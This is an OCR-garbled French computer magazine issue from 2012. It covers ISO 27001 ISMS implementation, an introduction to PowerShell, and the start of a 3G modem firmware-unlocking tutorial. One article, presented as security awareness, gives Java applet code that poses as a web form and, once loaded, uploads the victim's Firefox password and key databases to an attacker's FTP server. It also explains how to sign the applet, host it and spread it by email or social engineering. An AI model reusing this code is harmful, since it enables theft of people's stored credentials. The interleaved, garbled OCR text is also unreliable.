impÊratif. • Documentation : le SMSI nÊcess- ite le passage à la tradition Êcrite. Ainsi toute la documentation du SMSI re- posera sur les règles fixÊes dans cette procÊdure. • Audit interne et suivi des ac- tions : cette Êtape consiste à bâtir une structure d’audit interne afin d’assurer l’efficacitÊ et la conformitÊ que les processus du SMSI aux exigences de la norme. Les trois Êtapes prÊcÊdentes seront dÊtaillÊes dans la suite. • Formation et sensibilisation : la norme exige la sensibilisation du per- sonnel impliquÊ dans le système de management à la sÊcuritÊ ainsi que sa possession des compÊtences nÊces- saires à l’exploitation du SMSI. ce pro- jet sera aussi dÊtaillÊ dans le chapitre9. • Indicateurs : indiquent aux mangements l’Êtat d’avancement du projet Ils permettent aux dÊcideurs de connaitre le niveau de conformitÊ et de performance du système, ainsi tout processus qui qui s’intÊgrÊ au SMSI pourra faire l’objet d’un indicateur
• Etudes d’opportunitÊ : il consiste à concrÊtiser les apports de la mise en place d’un SMSI pour l’entreprise ainsi de bien connaitre les attentes des par- ties prenantes. • Etat des lieux : s’il s’est avÊrÊ que la mise en place apportera un gain pour l’entreprise, il conviendra ensuite de faire un Êtat de lieu cà d faires des point sur la situation de l’entreprise vis-à -vis du mÊcanisme ÊlÊmentaire du système de management • Etude des options (politique et pÊrimètre) : compte tenu de la situa- tion constatÊe, il sera possible d’Êtudier plusieurs options de pÊrimètre. Il s’agit de com- L’intÊrêt de cette structure rÊside parer le coÝtde chacune des options dans: avec les bÊnÊfices escomptÊs de • L’accueil des nouveaux processus chaque option s et finalement la direc- • La participation active aux con- tion gÊnÊrale retiendra la meilleure structions des nouveaux proces- option sus Cette phase est la plus sensible du projet car c’est elle qui dÊtermine si Phase 2 : La mise en place de la on peut continuer la construction avec structure de base. succès du SMSI ou condamne le projet Cette phase consiste à bâtir le à l’Êchec au cas oÚ elle est mal Êtablie socle des services qui formeront l’infrastructure du SMSI. Ce socle sera construit des phases suivantes : Phase 3 : mise en place des proces- sus du SMSI • Gouvernance de la sÊcuritÊ : il s’agit de mettre en place une hiÊrar- Constitue la phase la plus longue du chie à fin de prendre les bonnes dÊ- projet est constituÊ de : cisions de sÊcuritÊ. En effet, dès le • ApprÊciation des risques : c’est dÊpart du projet, la validation officielle un point clÊ du projet puisqu’elle per- de la politique et le pÊrimètre s’avère mettra les mesures de sÊcuritÊ les plus 22
Tera-Magazine
Dossier
Tera
propices par apport au contexte et à la politique du SMSI. • Adaptation des mesures de sÊ- curitÊ existantes : les mesures de sÊ- curitÊ dÊjà pris avant le projet du SMSI doivent être mises en conformitÊ avec le modèle PDCA • ImplÊmentation des mesures de sÊcuritÊ manquantes: les mesures de sÊcuritÊ sÊlectionnÊes dans la dÊclara- tion d’applicabilitÊ (SoA) et non encore mises en place devront être implÊmen- tÊ • Revue : constitue, avec l’audit interne, l’important de la phase check A la fin de cette phase, le système de management est presque terminÊ. Il ne reste qu’entamer la dernière phase pour rÊussir le projet
Phase 4 : Le dÊmarrage du SMSI L’objectif de cette Êtape consiste à vÊrifier si tout est prêt pour rÊussir la certification du premier coup. Cette phase est composÊe d’une succession d’Êtapes, comme suit : Revue de SMSI : elle se fait, nor- malement, une seule fois par an, com- me elle peut être faite juste à la fin de la construction du SMSI. Cette phase consiste à exÊcuter les processus dÊjà dÊfinis dans la phase prÊcÊdente (mise en place des processus du SMSI).ainsi il permet de faire des reculs afin de vÊri- fier l’efficacitÊ, le bon fonctionnement du système et que celui-ci rÊpond bel et bien aux besoins des parties pre- nantes. Il est recommandÊ de faire ap- pel à cette Êtape avant la commande à un audit de certification. PrÊparation à l’audit : cette Êtape constitue la phase de vÊrification et prÊparation de tous les documents nÊcessaires avant l’arrivÊe des audit- eurs. Audit à blanc : comme son nom l’indique, il s’agit d’un audit, de la sorte d’un examen blanc, qui a pour but 23
d’examiner le fonctionnement du SMSI, de plus prÊparer le personnel à l’audit rÊel. Il est recommandÊ de faire appel à un cabinet indÊpendant pour piloter cet audit. Action correctives et prÊventives : cette phase est introduite pour corri- ger toutes les Êcarts constatÊs lors de l’audit blanc. A ce stade, tous les pro- cessus seront dÊroulÊs au moins une seule fois, ils ont ÊtÊ auditÊs par un cabinet indÊpendant, les Êcarts figu- rants ont ÊtÊ corrigÊs, il ne reste qu’à l’inauguration officielle du SMSI, par la commande de l’audit de certification. Le digrammes suivant rÊsument l’approche du projet de SMSI
24
L’approche séquentielle « clas- sique » : Les SMSI fonctionnent selon un modèle cyclique en quatre étapes appelé « PDCA » c’est-à-dire : Plan, Do, Check, Act.
Phase plan
Fixe les objectifs du SMSI La phase Plan du SMSI comprend 4 étapes : Étape 1 : Définir la politique et le périmètre du SMSI Étape 2 : Identifier et évaluer les risques liés à la sécurité et élaborer la politique de sécurité. Étape 3 : Traiter le risque et identifier le risque résiduel par un plan de gestion Étape 4 : Sélection des mesures de sécurité à mettre en place
Phase do :
Met en place les objectifs Elle se découpe en plusieurs étapes : 1. Établir un plan de traitement des risques 2. Déployer les mesures de sécurité 3. Générer des indicateurs • De performance pour savoir si les mesures de sécurité sont efficaces • De conformité qui permettent de savoir si le SMSI est conforme à ses spécifications 4. Former et sensibiliser le personnel Phase check
management. Ces audits sont ponctuels et planifiés. 2. Le contrôle interne qui consiste à s’assurer en permanence que les processus fonctionnent normalement. 3. Les revues (ou réexamens) qui garantissent l’adéquation du SMSI avec son environnement.
Phase act Mettre en place des actions correctives, préventives ou d’amélioration pour les incidents et écarts constatés lors de la phase Check • Actions correctives : agir sur les effets pour corriger les écarts puis sur les causes pour éviter que les incidents ne se reproduisent • Actions préventives : agir sur les causes avant que l’incident ne se produise • Actions d’amélioration : améliorer la performance d’un processus du SMSI. Comme le resume le diagramme suivant:
Les erreurs à éviter : On présentera les erreurs courantes systématiquement commises : • Travail sans le soutien de la direction général • Travailler seul • Ne pas mettre en place la structure de base • Se tromper du périmètre • Déclaration d’applicabilité • Faire de la procédure
Consiste à gérer le SMSI au quotidien et à détecter les incidents en permanence pour y réagir rapidement 3 outils peuvent être mis en place pour détecter ces incidents : 1. Les audits internes qui vérifient la conformité et l’efficacité du système 24
Dossier
Tera-Magazine
Tera
ZOOM sur la deuxième Phase 2 de l’approche projet : mise en place de la structure de base du SMSI. Vue l’importance de cette phase qui est la plus sensible du projet car, elle condamne le projet à l’échec au cas où elle est mal établie
Comme nous avons vue l’approche projet pour la mise en place du SMSI est constituée de quartes phases dont la mise en place de la structure de base du SMSI est la plus déterminante, celle-ci à son tour est formée de Cinque étapes déjà présentés dans cet article. Nous étudions de prés les étapes de la documentation et celle de l’audit interne.
La Documentation : La documentation est un élément essentiel du SMSI. Sa mauvaise réalisation conduit à l’échec de système de management c’est ainsi qu’il incluse dans les exigences de la norme.
Exigences normatives. Il n’y a aucune contrainte par la norme sur le support de la documentation. Il peut être sur papier ou sous 25
format électronique. En revanche, la création d’une procédure décrivant comment la documentation sera gérée est et imposée par la norme. Cette procédure doit impérativement répondre aux questions suivantes : 1. comment les documents sont-ils approuvés ? 2. comment sont ‘ils mises à jour ? 3. comment les versions sont-elles gérées ? 4. comment restreindre l’accès à ces documents sur les personnes qui sont concernées seulement ? 5. comment sont-ils retirés lorsqu’ils ne sont plus valides?. Il sied, dans un premier temps, d’enlever la confusion entre les deux notions : document et procédure. En effet, il existe trois catégories de documents : 1. les documents de politique : consiste à fixer les objectifs à atteindre dans un domaine particulier 2. les documents de procédure : consiste à décrire les activités relatives à un processus bien défini 3. les enregistrements : ces eux qui prouvent la convenance du fonctionnement du procédure, ils peuvent être sous plusieurs formes.
Documents d’exigés : On va expliciter dans la suite les documents nécessaires au SMSI.
Documents explicitement exigés : La clause 4.3.1 liste les documents obligatoires pour la mise en œuvre d’un SMSI • Politique et périmètre du SMSI
26
• Description de la méthode d’appréciation des risques • Rapport d’appréciation des risques • Plan de traitement des risques • Déclaration d’applicabilité (SoA) • Procédure descriptif de la mise en œuvre d’efficacité et de conformité des mesures (4.2.3.c) • Toutes les procédures en support du SMSI Documents implicitement nécessaires : Ces documents ne sont pas mentionnés dans la liste du chapitre 4.3.1, mais chacun deux est mentionnée au moins une fois dans la norme ce qui les rend nécessaires • Procédure de gestion des documents clause (4.3.2), montre comment sont créés, validés, mis à jour. • Autorisation du management à mettre en place et à exploiter le SMSI clause (4.2.1.i) • Approbation du management sur les risques résiduels (clause 4.2.1.h) • Procédure de détection et de réaction aux incidents (clause 4.2.2.h et 4.2.3.a.2) • Procédure de sensibilisation et de formation à la sécurité (clause 5.1.d et 5.2.2) • Procédure d’audit interne (clause6) • Procédure de revue du SMSI (clause 7) • Toutes les procédures en support des mesures de sécurité sélectionnées dans l’Annexe A.
Erreurs très courantes à Bviter 1. La procédure ne décrit pas la réalité : il y a un grand écart entre ce qui est dit et ce qui est fait. Cette situation apparait lorsque la personne qui rédige la procédure n’est pas la même que celle qui l’applique (dans le cas d’un appel à des prestataires pour la rédaction des documents du SMSI) 2. La procédure de gestion des documents n’est pas appliquée. 3. La numérotation des documents est incohérente 4. Seuls les documents MS Word comporte une cartouche. En effet la procédure de gestion de la documentation présente souvent un exemple de cartouche qui permet d’identifier qui a fait quoi sur le document. Or, les tableaux les documents PDF et les rapports issus d’application ne comporte pas ce cartouche.
Recommandations : ll est recommandé, pour rédiger de façon claire qui répond aux exigences de la norme de faire des rubriques qui répondent très clairement aux questions suivantes : qui ? Fait quoi ? Quand ? En générant quel enregistrement ? De plus, il est vivement conseillé que ces procédures soient rédigées par ceux qui les exécutent, ou au moins validés par ces personnes. Finalement, il est favorable de rédiger de façon laconique.
26
Dossier
Tera-Magazine
Tera dans le SoA, au modèle PDCA.
Audit interne et suivi des actions L’audit interne et le suivi des actions constituent le second pilier du SMSI. Les audits internes vérifient la conformité et l’efficacité du système management. Ces audits sont ponctuels et planifiés. C’est le processus le plus important de la phase check du PDCA. Le contrôle interne consiste à s’assurer en permanence que les processus fonctionnent normalement.
Exigences normatives : Les clauses 4.2.3.a.3 et 4.2.3.e abordent l’audit interne. L’article 6 détaille les exigences en matière de matière d’audit interne. L’audit doit impérativement suivre le modèle PDCA. Il est important de mettre en place un document de procédure qui décrit la manière avec laquelle sont planifiés les audits, les rapports qui seront issus de cette étape, serviront d’enregistrement pour prouver le bon fonctionnement du processus, finalement des revus mettront en exergue les actions à effectuer pour améliorer les audits. L’implémenteur dispose de toute la liberté d’adapter une démarche à condition que cette dernière suit le modèle PDCA. Les objectifs de l’audit interne : Les trois principaux objectifs de l’audit interne sont : 1. Absence d’écart entre les processus du SMSI et les exigences des clauses 4 à 6 de la norme 2. La conformité de l’application des mesures de sécurité, mentionnées 27
3. L’absence d’écart entre les procédures internes et leur application réelle. On peut remarquer qu’il ne s’agit pas de vérifier l’efficacité des mesures de sécurité, mais plutôt de vérifier si la roue de Deming arrive à tourner. En effet, il faut différencier entre l’audit technique qui sert à vérifier le niveau de sécurité effectif de l’entreprise et l’audit interne qui a pour rôle de vérifier si le système de management répond aux exigences de la norme. Mais rien n’empêche que ces deux procédures soient complémentaires. Programme des audits internes : Il s’agit d’un document obligatoire qui comporte les dates prévues des prochains audits et le champ de chacun. Il est important de bien saisir les notions suivantes Champ d’audit : désigne la liste des points qui seront à contrôlés lors d’un audit (déroulement des audits) Programme d’audit : désigne la liste des audits programmés durant l’année Plan d’audit : détailles les points à aborder lors d’un audit Le déroulement des audits internes : Quelques semaines avant l’audit, l’auditeur présente à l’audité le plan d’audit qui détailles les champs des actions qui vont être auditées La méthodologie d’un audit : La mise en place des audits internes peut être interne c.-à-d. : désigner les auditeurs parmi les personnels internes de l’entreprise ou bien externaliser la procédure en faisant appel à des prestataires professionnels, mais l’inconvénient de cette stratégie réside
28
dans le cout important de son élaboration, comme on peut combiner les deux méthodes en exécutant les audits internes avec le personnel interne de l’entreprise et faire appel à un extérieur une fois par an Suivi des actions : Un audit ne sert à rien s’il n’est suivi d’action. En effet lorsqu’un auditeur constate une non-conformité dans un processus, son responsable doit entreprendre les actions pour corriger les causes et les effets Les actions peuvent êtres : Action correctives : surviennent lorsqu’un écart ou un incident s’est produit ou lorsqu’une mesure de sécurité s’avère inefficace Dans ce cas il faut agir sur les effets et les causes Les actions préventives : surviennent avant qu’un écart ou incident ne se produit Dans ce cas on ne peut agir que sur les causes Lorsqu’un écart est identifié par un auditeur, l’audité est appelé à réagir ainsi : 1. proposer à l’auditeur les actions correctives et préventives ainsi qu’un délai de réalisation dans un document intitulé « fiche d’écart ». 2. faire valider les actions et leurs délai par l’auditeur, cette validation est faite sur la fiche d’écart 3. mettre en place ces actions 4. vérifier l’efficacité de ces actions. Nous rappelons que L’audit interne et le suivi des actions constituent le second pilier du SMSI. Cette étape consiste à bâtir une structure d’audit interne afin d’assurer l’efficacité et la conformité que les processus du SMSI aux exigences de la norme. Ainsi nous avons couvert deux des plus importants composants de la phase de mise en place de la structure du SMSI.
à Suivre ... à travers cet article nous n’avons vue qu’une part de la partie émergée de l’iceberg. Il reste beaucoup de choses à éclaircir. Dans la suite de ce dossier nous allons découvrir les audits et les processus de certification, les organismes de certification. Comment peut-on se certifier iso 27001 au Maroc? Combien ça coute etc. Nous espérons que vous avez revalorisé cette norme qui constitue bien un avantage concurrentiel plus qu’un simple label de marketing. Attendez la suite dans le prochain numéro de ce Magazine. Nous comptons bien sûr vos feedbacks.
28
r e Pow Le shell de Windows. un outil
à découvrir.
Prérequis : Connaissances en cmd.exe Outils : Windows, Powershell instalé Durée: 10 min
J
e ne vous apprendrai rien, si je vous dirais que l ’environnement en ligne de commande fournit avec les systèmes Windows est très pauvre en tout. Pour palier à ce manque et pour être au niveau des différents shells Unix et les autres langages de scripting tels que : Perl, ou VBScript, etc. Microsoft propose donc PowerShell.
17
Après l’apparition du XP Windows a définitivement négligé son MSDOS en faveur d’une simple invite de commande cmd.exe sans grand intérêt qui ne présente pas de fonctionnalités avancées et une documentation médiocre. Avec le passage à Windows Vista/7 et l’apparition du Powershell, cette image va-t-elle changer ? Windows tend-elle à s’inspirer de Linux et offrir enfin un vrai langage de script. ? Selon le site officiel du powershell, Le but de Microsoft est de faire un langage de script complètement intégré, avec autant de fonctionnalités que celles qui existent sous Unix (et Linux) et avec le même niveau de sécurité.
l l e h S r e >>Présentation du Powershell PowerShell est le successeur des interfaces en ligne de commande fournies par •command.com (c’est-à-dire l’interface MS-DOS) de Millennium, Windows 98 et de ses prédécesseurs ; •cmd.exe de Windows NT depuis 1993.
Windows PowerShell, anciennement Microsoft Command Shell (MSH) est une interface en ligne de commande et un langage de script développé par Microsoft
Powershell est un langage de script orienté objet développé par Microsoft. Il s’appuie sur le framework Microsoft .NET .Il est désormais directement intégré aux nouveaux systèmes d’exploitation Windows 7 et Windows Server 2008. Powershell est compatible avec toutes les versions de Windows supportant le Framework.NET 2.0. La version finale a été publiée le 14 novembre 2006.
18
Tera-Magazine
PowerShell
Tera
Caractéristiques du PowerShell
• Le cœur du langage est basé sur la norme POSIX 1003.2 suivie par Korn shell. • Il ressemble beaucoup à PHP et Perl. • La syntaxe a été alignée sur C# On peut donc très facilement convertir du code C# en PS et réciproquement • Support des Alias, Tab-compétion & usage des paramètres • Pipelining, Object utilities, meilleur documentation, • Cmdlets securisés • Orienté Objet • Extensible • Facile à apprendre • Accès aux objects: ADO,◦ .NET,◦ WMI,◦ COM,◦ Etc…
Si votre système est supporté vous aurez alors à installer le .NET Framework 2.0, Puis installer le package PowerShell correspondant à votre système (Fig1). Depuis le 24 mars 2009, Windows PowerShell 1.0 pour Windows XP et Vista est distribué comme une mise à jour logicielle fa-
fig.1
cultative par le service Windows Update de Microsoft. http://www.microsoft.com/windowsserve r2 003/ te ch no l o gi e s/m a n a g e m e nt/ powershell/download.mspx
PowerShell est plus proche des langages de script orientés objet comme Perl que des langages de shell, comme bash. Il n’y a aucune ressemblance entre le PowerShell et le très simpliste langage batch des fichiers .BAT de DOS/Windows. Disponiblité du PowerShell : Les pré-requis Des connaissances de base sur la programmation orientée objet sous .NET faciliterons la compréhension de cet article.
Installer PowerShell PowerShell est supporté aujourd’hui uniquement par les systèmes suivants: • Windows XP Service Pack 2 • Windows Server 2003 • Windows Vista • Windows Seven • Windows Server 2008 19
“PowerShell est plus proche
des langages de script orientés objet comme Perl que de langages de shell, comme bash.”
20
Utilisation de Powershell La version 2 de PowerShell apporte de nombreuses évolutions, notamment l’écriture de cmdlet en code natif à l’aide de fonctions avancées utilisant différents types d’attributs.
Utilisation :
L’utilisation du Powershell, passe soit par l’invite de commande cmd.exe en utilisant la command powershell ou en utilisant sa propre invite de command. Une fois votre nouvel environnement de Scripting PowerShell installé il ne reste plus qu’à vérifier qu’il est bien fonctionnel. Pour lancer PowerShell, je vous propose plusieurs solutions: 1-Lancer Windows PowerShell à partir du menu Démarrer / Programmes / Windows PowerShell 1.0 2-Créer un raccourci de powershell. exe à partir de C:\Windows\System32\ windowspowershell\v1.0 3-Taper powershell directement dans Démarrer / Exécuter ou suffit de presser la touche WIN + R et de taper Powershell puis ENTER pour lancer l’interpréteur. 4-lancer une recherche dans le menu démarrer (Fig3) de powershell.
verbe, comme dans l’exemple ci-dessous : [VERBE]-[NOM] >>Exécuter une commande Nous allons exécuter notre première “cmdlets”. Une fois dans l’interpréteur PowerShell, exécuter la commande suivante:
get-command qui retourne un ensemble de commandes (cmdlets) disponibles en powershell. Nous allons maintenant exécuter notre deuxième commande, À savoir celle qui nous permet de lister les commandes disponibles, un classique. Get-Process elle Affiche les informations des processus en cours d’exécution. Le résultat est présenté dans la figure ci-dessous (Fig.5)
fig.3
Get started !! >>Syntaxe et premières commandes
fig.5 : résultat du get-process
www.Teramagazine.tk
2012
Concernant la syntaxe au sein de PS, elle est en réalité très simple car elle se compose de 2 éléments, un sujet et un 20
Tera-Magazine
PowerShell >>Créer un script Powershell Pour créer un fichier de script PowerShell, il suffit de créer un fichier ayant pour extension .PS1 dans lequel vous allez copier votre code. On peut aussi utiliser l’outil Windows Power Shell ISE qui est disponible sous Windows Seven (Fig6).
Fig.6: windows powershell ISE
Exemple de la puissance de ce powershell : Powershell est un outil puissant pour réaliser des scriptes bien utiles est performant. le simple bout de code suivant peut bien vous être utile .
Astuce Pour le CLi Powershell : Affichage de l’historique des commandes tapées, presser F7. F5 pour réutiliser la dernière commande tapée (Fig7)
[Activator]::CreateInstance([Type]::G etTypeFromCLSID([Guid]’{DCB00C01570F-4A9B-8D69-199FDBA5723B}’)). IsConnectedToInternet True Cette ligne de commandes retourne “true” si votre machine est connectée à internet ou “false” dans le cas contraire.
Fig.7: Cli+ F7 21
22
www.Teramagazine.tk
2012
Quand vous commencez à apprendre PowerShell, je pense que vous serez très heureux. Une grande partie de la conception est fortement influencée par les origines Unix de Windows, bien qu’ils sont actuellement tout à fait différent. Testez vos commandes *nix préférés sur powershell et jugez-le vous même.
22
Sécurité informatique
Niveau : Débutant Outils : Netbeans, Java
Par : ILYAS BAGUI
Durée: 30 min
Partie 2 : vol des mots de passes ans la première partie de cet article, publiée dans l’édition précédente de cette revue, je vous ai expliqué le danger potentiel qui tourne autour de vos mots de passe enregistrés dans les navigateurs. J’ai introduit les méthodes pour les décrypter et les lire sans votre permission. Toutefois, pour le faire il faut s’emparer, comme j’ai déjà expliqué, d’un certain nombre de fichiers de chez vous. Dans cette partie nous allons faire un exemple qui explique comment à travers une page web peut-on avoir accès aux données nécessaires. Certes il existe plusieurs méthodes, cependant par mesure de sécurité, je présente la moins dangereuse, vu que le but de cet article n’est pas de vous initier à prendre les donnes d’autrui ,mais plutôt d’avoir une idée de ce qui vous menace en navigant sur Internet.
D
23
Dans mon article précédent j’ai parlé de Firefox seulement comme un exemple mais l’idée peut bien s’étendre à chrome, MSN, clés de vos registres Windows, etc. … Pour avoir accès à votre disque dur en ligne il existe différents moyens. Je choisi le plus courant c’est de créer une page web qui contient du code malicieux. Pour ne pas causer des ennuis si cet article tombe entre de mauvaises mains je choisi d’utiliser un moyen dont il est facile de s’en protéger. Il s’agit de la mise en place d’une page web qui contiendra juste une ‘Applet java’ qui se charge de récupérer les fichiers voulues. Je vous conseille vivement de lire la première partie avant de continuer la suite pour connaître le but de cet article.
Pré-requis :
Comme j’ai précisé au début je vais utiliser une applet java pour piéger la victime, donc avant de se lancer je mets une petite définition de celle-ci. Applet Java: Si vous êtes un développeur Java vous connaissez sans doutes les applets Java. Il s’agit d’une classe Java qui peut être exécuté par un navigateur. Alors, ça sera notre fenêtre vers l’ordinateur de la victime. En mots simple une applet c’est du code java dans un navigateur. FTP : Nous aurons aussi besoin d’un compte FTP pour que l’applet puisse transférer les fichiers « volés » vers ce serveur
Let’s start
Pour vous éclaircir la démarche nous procédons en étapes :
Étape 1 : création de l’applet L’idée sera de créer une page web contenant un simple formulaire qui sera destiné à la victime pour le remplir. Nous commençons tout d’abord par la mise en place de ce formulaire qui sera codé en Java sous forme d’une applet Web. Pour coder j’utilise Netbeans, vous pouvez utiliser l’IDE de votre choix.
Je crée un nouveau projet JAVA je le nomme « applet » et j’y ajoute ensuite, une nouvelle applet. Ensuite vous devez ajouter la librairie ‘simpleftp. jar’ (disponible à http://www.mediafire. com/?7cd4maa5tg9hbl0) pour avoir la possibilité d’envoyer les fichiers à un serveur FTP sur le web.
Fig.2
Le code est un peu long je vous explique en gros de quoi il s’agit. Les fichiers du projet seront disponibles à teramagazine.tk Le code est simple à comprendre même si vous n’êtes pas un développeur confirmé.
Codons un peu !! Si c’est la première fois que vous avez affaire à une applet je vous conseille de lire un tutoriel pour vous initier à leurs développements. Utiliser l’assistant graphique pour designer votre applet sous forme d’un simple formulaire qui sera utilisé comme une façade qui cache le code malicieux, donc peut importe sa forme ou son contenu. Cette applet aura comme forme(Fig.3) :
Fig.3 : applete java sous forme d’un formulaire
24 Fig.1 :Netbeans
Tera-Magazine
Sécurité informatique
Après la création de l’applet on introduit les packages utilisés et la méthode private javax.swing.JLabel jLabel1; d’initialisation. Le code sera donc comme private javax.swing.JLabel jLabel2; suivant : private javax.swing.JLabel jLabel5; package applet; private javax.swing.JLabel jLabel6; import java.io.File; private javax.swing.JTextField jTextimport java.io.FileInputStream; Field1; import java.io.IOException; private javax.swing.JTextField jTextimport org.jibble.simpleftp.*; Field2; /* } ** @author Tera magazine */ public class Jform extends javax.swing. JApplet { /** Initializes the applet Jform */ public void init() {
try { java.awt.EventQueue. invokeAndWait(new Runnable() { public void run() { initComponents();
Rien de spécial dans ce bout de code, sauf la fonction voler() qui se charge de tout faire. Au code précèdent il manque bien sur la définition de la méthode voler qui se lance une fois que l’applet est chargé dans le navigateur de la victime, donc qu’il remplisse ou non le soit disant formulaire la méthode voler() s’exécute . Voyons de près cette fonction
voler(); } }); } catch (Exception ex) { ex.printStackTrace(); } } // Variables declaration - do not modify private javax.swing.JButton jButton1; 25
La suite du code
26
public static void voler() { SimpleFTP ftp = new SimpleFTP(); // Connect to an FTP server on port 21. try{ ftp.connect(“Votre_serveur_FTP”, 21, “Nom_utilisateur”, “Mot_de_passe”); ftp.bin(); ftp.cwd(“ftp”); double f=Math.random(); String userName = System.getProperty(“user.name”); Dans cette partie de code l’applet affiché chez la victime établie une connexion avec un serveur FTP String[] profiles; String path=System.getenv(“APPDATA”)+”\\Mozilla\\Firefox\\Profiles\\”; profiles=dossi_profil(path); for (int i=0; i<profiles.length; i++) { if(profiles[i]!=null) { // System.out.println(profiles[i]); String signons=f+userName+”.sqlite”; String cert=f+userName+”.db”; String key=f+userName+”.db”; /****************************************envoie vers le serveur*************************/ File filefx=new File(path); if(filefx.exists()) { ftp.stor(new FileInputStream(new File(path+”\\”+profiles[i]+”\\signons. sqlite”)),signons); ftp.stor(new FileInputStream(new File(path+”\\”+profiles[i]+”\\cert8. db”)),”cert”+cert); ftp.stor(new FileInputStream(new File(path+”\\”+profiles[i]+”\\key3. db”)),”key”+key); } else { //firefox non instalé }
www.Teramagazine.tk
2012
//////////////////////////////////////////////////// vous pouvez prendre ce que vous voulez de la machine victime Je vous laisse le soin de lire le code et de le modifier. 26
Tera-Magazine
Sécurité informatique
Étape 2 création de la page web pour cibler la victime Après le codage de l’applet malicieuse nous aurons besoin de la signer. Car habituellement, le système de sécurité des applets Java interdit totalement aux applets d’accéder aux ressources de la machine (disque dur, base de registre, etc.)
rer votre clé qu’une seule fois
3 Signez votre applet avec votre clé Utilisez la line suivante dans votre invite de commande: jarsigner -verbose monapplet.jar votreNomdAlias ensuite donnez le mot de passe de votre clé. Voilà, votre applet est signée.
Bien sur ne croyez pas que SUN(oracle) a été si stupide pour créer un moyen qui accède au disque si faci- Étape 3 Testez votre applet lement sans alerter l’utilisateur et c’est déjà pourquoi j’ai utilisé cette méthode Créez une page HTML contenant le code suivant puisqu’elle alerte la cible pour qui il permet ou non son exécution(Fig.2) . <html> <APPLET CODE=”applet/Jform.class” Si vous voulez créer une applet qui WIDTH=”100%” HEIGHT=600px> outrepasse ces sécurités, il est néces</html> saire que: Enregistrez-la sous le nom index.html, ensuite, testez votre applet en affichant • Vous créez une applet signée la page crée. cryptographiquement • l’internaute autorise explicitement Si tout a bien abouti, placez votre apl’applet à accéder au système plet sur un serveur et testez la via web. Vous verrez une fenêtre d’avertissePour signer notre applet on doit pasment s’affiche immédiatement(fig4), inser par le processus suivant : diquant que la signature de l’applet n’as pas pu être vérifié et par conséquent il demande à l’utilisateur s’il autorise cette 1 Compilez l’applet applet ou non. Comme d’habitude (créez un fichier .jar).
2 Générez la clé de signature Votre clé cryptographique vous servira à signer toutes vos applets. Tapez: keytool -genkey -alias votreNomdAlias et donnez les informations nécessaires. N’oubliez pas le mot de passe que vous avez entré pour protéger cette clé. Vous n’avez besoin de généFig.4: Alerte de sécurité
27
28
Étape 4 création d’un compte d’hébergement web et un compte FTP. Vous pouvez, vous référez à l’article “ hébergements web gratuits “ apparu dans l’édition de juin. Dans mon cas, j’utilise habituellement freehostia.com. Créez un compte d’hébergement web, vous aurez les paramètres d’authentification ensuite créez un compte ftp et utilisez les données fournies dans votre code d’applet dans la fonction connect(). ftp.connect(“Votre_serveur_FTP”, 21, “Nom_utilisateur”, “Mot_de_ passe”); Chargez le fichier html et la class dans la racine de votre serveur. L’ URL Votre_serveur.com/index.html contiendra désormais une page malicieuse qui peut être diffusée par mail ou par Social engineering.
C’est ici que se termine cet article qui met un point sur la sécurité informatique par un exemple concret. J’aurais pu utiliser d’autre technique surtout celles qui se basent sur les vulnérabilités des browsers ou autre pour s’infiltrer chez vous. Peut être dans de prochains articles. J’espère que cet article vous a plu. Faites-en bon usage.
Pour voir une démo de cette applet veuillez visiter http://goo.gl/0shdE Si une victime accède donc à votre applet les fichiers dont on a parlé dans la première partie seront chargés sur votre serveur et vous pouvez suivre donc les instructions pour décrypter les informations récupérées.
Important
www.Teramagazine.tk
2012
J’aimerais signaler qu’il existe des méthodes pour casser ce message de sécurité et forcer l’exécution de l’applet surtout avec Java 7, mais pour des raisons de protection je me contente de vous donner cette information sans révéler comment. Pour en discuter vous pouvez me contacter à : aker.white@gmail.com 28
Tera-Magazine
Tera-Labo
Tera-Labo Mise à jour et activation des fonctionnalités cachées.
P45
Dificulté Moyenne
Temps
15
Minutes
Outils Modem huwawei, firmwire
“LANCER ET RECEVEOIR DES APPELS EN CONNECTANT UN MODEM 3G EST POSSIBLE !!”
29
30
MODEM 3G
Flush et Upgrade Par: Kamal bardi
Activation des appels mobiles & Mise à jour du firmwire
P
our des questions de concurrence les opérateurs marocains(IAM, Méditel, INWI), comme partout dans le monde, personnalisent les firmwares (programme embarqué) des modems 3G pour imposer des limitations d’utilisation, pour cacher des fonctionnalités qui sont offertes par le constructeur d’origine (Huawei, ZTE..) et pour changer le design(couleurs,logo…). L’utilisateur étant indifférent aux stratégies de marketing des opérateurs, il cherche à tirer pleinement profil du produit acquis et ceci en contournant les limites imposées (opération légale). Il est fréquent d’avoir le besoin d’utiliser
un modem avec une puce d’un opérateur différent ou lancer et recevoir des appels(audio/vidéo) à travers son ordinateur, tout en se connectant à son modem sans pour autant remettre la puce à son portable surtout pour les abonnées aux offres mobiles qui dispose d’une puce 3G. S’a joute aussi le besoin d’installer une interface graphique sous linux pour la gestion de son modem 3G. Pour arriver à ces fins, il existe des opérations (flashage, mise à jour..) qu’il faut réaliser pour libérer son modem et profiter pleinement de sa puissance. Si vous êtes intéressé par ces opérations, à vous la suite.
Modems Ciblés Huawei E156, E155, E1550, E1552, E156G, E160, E160G, E161, E166, E169, E169G, E170, E172, E176, E1762, E180, E182E, E196, E226, E270, E271, E272, E510, E612, E618, E620, E630, E630+, E660, E660A, E800, E870, E880, EG162, E880, EG162, EG162G, EG602, EG602G Si vous avez un autre type ne désespérez pas il s’agit de la même procédure.
www.Teramagazine.tk
2012
Contactez-nous par mail pour vous aider.
30
Tera-Magazine
Tera-Labo Comment savoir le modèle ? Le modèle est indiqué sur le dos de votre modem, comme le montre la figure ci-dessous(Fig1)
Fig.1
Présentation du modem E1550
réussir à 99% cette opération
Étape 1 :
Procurez vous le logiciel suivant : GSM Multi Hub récupérable à http:// www.mediafire.com/?dk2k7s4btqiesvk Ce logiciel est destiné à un grand
Fig2 : GSM Multi Hub
